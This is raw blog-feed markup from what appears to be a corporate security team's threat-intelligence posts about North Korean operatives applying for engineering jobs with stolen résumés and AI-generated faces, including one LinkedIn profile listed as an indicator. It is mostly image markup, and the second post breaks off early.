srcset="https://substackcdn.com/image/fetch/$s_!q6hZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic 424w, https://substackcdn.com/image/fetch/$s_!q6hZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic 848w, https://substackcdn.com/image/fetch/$s_!q6hZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic 1272w, https://substackcdn.com/image/fetch/$s_!q6hZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">A Famous Chollima named &#8220;Juli&#225;n&#8221;</figcaption></figure></div><p>&#8220;<strong>Juli&#225;n</strong>&#8221; stole a resume and a portfolio from a <strong>Senior Full Stack Engineer</strong> from <strong>Colombia</strong> and tried to pose as him in order to gain a position at our company.</p><p>Born and raised in <strong>Colombia</strong>, &#8220;<em>el se&#241;or Juli&#225;n</em>&#8221; <strong>does not speak a single word of Spanish</strong>, which is, once again, odd to say the least.</p><p>&#8220;<em>I was sent abroad to <strong>Singapore</strong> from a young age</em>&#8221; he states, &#8220;<em>but I&#8217;m now once again in <strong>Colombia</strong></em>&#8221;. </p><p>Curious geographical choice, but I&#8217;ve seen this trick before: it is used to eventually match any <strong>timezone anomaly</strong> we could ever catch, as <strong>Singapore</strong> is in <strong>GMT+8</strong> and <strong>North Korea</strong> in <strong>GMT+9</strong>.</p><p>Him <strong>not speaking a single Spanish word</strong>, along with the <strong>strange background story</strong> and added to the <strong>recent events</strong>, may tell us this is a dead giveaway of Chollima activity.</p><p>But for us at the <strong>Quetzal Team</strong>, who see the <strong>devil in the details</strong>, it is <strong>another</strong> <strong>thing</strong>.</p><p>Maybe, <strong>just maybe</strong>, it&#8217;s because this <em>cattle-head</em> stole Juli&#225;n&#8217;s name, but forgot to switch identities and entered the meeting under the name &#8220;<strong>Arthur Burrus</strong>&#8221;.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lDAR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lDAR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png 424w, https://substackcdn.com/image/fetch/$s_!lDAR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png 848w, https://substackcdn.com/image/fetch/$s_!lDAR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png 1272w, https://substackcdn.com/image/fetch/$s_!lDAR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!lDAR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png" width="528" height="278" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:278,&quot;width&quot;:528,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:60939,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/177918157?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!lDAR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png 424w, https://substackcdn.com/image/fetch/$s_!lDAR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png 848w, https://substackcdn.com/image/fetch/$s_!lDAR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png 1272w, https://substackcdn.com/image/fetch/$s_!lDAR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e95483e-ba87-453a-bce2-97a0cb79af2b_528x278.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>An error like this is the typical indicator that this is probably not your first rodeo, <strong>but should be your last</strong>.</p><p>I hope you enjoyed this short article. We are the <strong>Quetzal Team</strong>: we put the &#8220;<em>Famous</em>&#8221; in &#8220;<em>Famous Chollima</em>&#8221;.</p><div><hr></div><h2>IOCs</h2><pre><code>URL:https://www.linkedin.com/in/julian-mendez-working0628/</code></pre><p>Yes, the profile URL says &#8220;-<em>working</em>&#8221;. I&#8217;m still picturing what other reasons I would have <strong>LinkedIn</strong> for.</p><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Gnl9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Gnl9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!Gnl9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!Gnl9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!Gnl9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Gnl9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic" width="200" height="200" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:200,&quot;bytes&quot;:73912,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/177918157?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Gnl9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!Gnl9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!Gnl9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!Gnl9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa702dd67-5470-47b4-b833-ac205480d93a_1280x1280.heic 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p>]]></content:encoded></item><item><title><![CDATA[Interview with the Chollima III]]></title><description><![CDATA[Third time's the charm (or so they thought)]]></description><link>https://quetzal.bitso.com/p/interview-with-the-chollima-iii</link><guid isPermaLink="false">https://quetzal.bitso.com/p/interview-with-the-chollima-iii</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Thu, 30 Oct 2025 18:30:29 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!dGuU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dGuU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dGuU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!dGuU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!dGuU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!dGuU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dGuU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png" width="334" height="501" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:1024,&quot;resizeWidth&quot;:334,&quot;bytes&quot;:3503211,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/177385196?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dGuU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!dGuU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!dGuU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!dGuU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb4588e1a-c2fa-4bad-93be-124457212efe_1024x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We all picture the future in different ways, some more optimistic, others not so much. Many people wrote about it, <a href="https://en.wikipedia.org/wiki/Jules_Verne">some foretelling great inventions</a> or <a href="https://en.wikipedia.org/wiki/Neil_Postman">warning about social problems</a>, whilst others chose more unrealistic fiction (at least for that time), like <a href="https://es.wikipedia.org/wiki/Philip_K._Dick">Philip K. Dick</a>. He wrote about &#8220;<em>andys</em>&#8221;, androids whose <em>synthetic</em> existence mimicked that of natural humans, trying to deceive observers into accepting them as such.</p><p>I know for sure that many would have giggled at the idea at the time, but that future eventually caught up with us in a <em>certain</em> way. Today, it&#8217;s become commonplace to see AI being abused to <a href="https://www.eftsure.com/blog/cyber-crime/these-7-deepfake-ceo-scams-prove-that-no-business-is-safe/">generate deepfakes of influential people</a> and to use them as puppets to promote scams<a href="https://www.eftsure.com/en-au/blog/cyber-crime/finance-worker-loses-39-million-to-deepfake/"> or to video call their employees asking for gift cards or wire transfers</a>.</p><p>This is a story about a couple of <em>synthetics</em>. Two North Korean agents who tried to land jobs with us by faking <strong>entire artificial existences</strong>, with <strong>stolen r&#233;sum&#233;s</strong> and synthetic <strong>AI-powered faces</strong>.</p><div><hr></div><h2>A Famous Chollima</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jwDs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jwDs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!jwDs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!jwDs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!jwDs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jwDs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png" width="333" height="499.5" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:1024,&quot;resizeWidth&quot;:333,&quot;bytes&quot;:3337629,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/177385196?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!jwDs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!jwDs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!jwDs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!jwDs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8323137e-0b58-48a2-8bdd-a181aea0121f_1024x1536.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We spoke about <strong><a href="https://malpedia.caad.fkie.fraunhofer.de/actor/wagemole">Famous Chollima</a></strong> in the past (<a href="https://quetzal.bitso.com/p/interview-with-the-chollima">and even met them a couple of times</a>). They are a division of <strong>Lazarus</strong>, a state-sponsored <strong>Advanced Persistent Threat</strong> (APT) linked to the <strong>DPRK</strong> (Democratic People&#8217;s Republic of Korea) or, simply put, <strong>North Korea</strong>.</p><p>This division specialises in corporate espionage and fund acquisition, and they do so in a creative way: <a href="https://edition.cnn.com/interactive/2025/08/05/world/north-korea-it-worker-scheme-vis-intl-hnk/index.html">by landing jobs at western companies</a>. This grants them access to both corporate secrets and clean money, which ultimately is sent to the sanctioned regime&#8217;s coffers.</p><p>Originally, their primary targets were <strong>Software Engineering positions</strong> in the <strong>Crypto/Web3</strong> and <strong>Financial</strong> sectors (especially <strong>Fintech</strong>), but recent reports place them in other markets like <a href="https://www.wired.com/story/north-korean-scammers-are-doing-architectural-design-now/">civil engineering and architecture</a>, so it&#8217;s safe to say&#8230; nobody is entirely safe.</p><p>And this is how everything started: with a <strong>Senior Software Engineer</strong> position posted on our website. That&#8217;s when we first met our synthetics, <strong>Mateo</strong> and <strong>Alfredo</strong>.</p><div><hr></div><h2>Do Chollimas Dream of Western Jobs?</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OgGh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OgGh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!OgGh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!OgGh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!OgGh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OgGh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c4e9981-888c-4420-9dad-eb5e9bbe8192_1024x1536.png" width="334" height="501" 